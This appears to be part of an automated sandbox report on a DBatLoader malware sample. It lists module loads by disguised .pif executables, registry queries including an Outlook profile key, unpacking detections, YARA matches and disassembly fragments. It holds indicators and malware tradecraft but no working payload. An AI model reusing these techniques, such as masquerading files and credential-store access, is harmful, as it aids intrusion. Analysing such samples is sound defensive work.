Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: sppc.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: mscoree.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: version.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: textshaping.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: textinputframework.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: coreuicomponents.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: coremessaging.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: ntmarta.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: coremessaging.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Section loaded: wintypes.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Section loaded: userenv.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Automated click: OK
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\Libraries\rpkhzpuO.pif

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PO#5_Tower_049.bat

Static file information: File size 1243067 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: rpkhzpuO.pif, 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2220114157.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2230537211.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2213918135.000000001BAE6000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2319463942.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2228595916.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000017.00000002.2389107729.000000002C1DA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216D1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.000000000081D000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 7.2.rpkhzpuO.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 18.2.rpkhzpuO.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 23.2.rpkhzpuO.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 7.2.rpkhzpuO.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 18.2.rpkhzpuO.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 23.2.rpkhzpuO.pif.400000.2.unpack

Yara detected DBatLoader

Source: Yara match	File source: 7.1.rpkhzpuO.pif.1350008.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.1350008.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.rpkhzpuO.pif.1350008.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rpkhzpuO.pif.1350008.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.27c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.22a65a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.22a65a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2105851599.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2063317653.0000000001220000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2066610296.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.rpkhzpuO.pif.26ac3d90.15.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.3.rpkhzpuO.pif.23be07b8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.rpkhzpuO.pif.27f00f08.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 7.2.rpkhzpuO.pif.28640000.18.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: rpkhzpuO.pif.4.dr

Static PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027D87A0 LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_027D87A0

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027C32FC push eax; ret	4_2_027C3338
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027EC2FC push 027EC367h; ret	4_2_027EC35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027C635C push 027C63B7h; ret	4_2_027C63AF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027C635A push 027C63B7h; ret	4_2_027C63AF
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027EC0AC push 027EC125h; ret	4_2_027EC11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027EC144 push 027EC1ECh; ret	4_2_027EC1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027EC1F8 push 027EC288h; ret	4_2_027EC280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027D86C0 push 027D8702h; ret	4_2_027D86FA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_027C6740 push 027C6782h; ret	4_2_027C677A
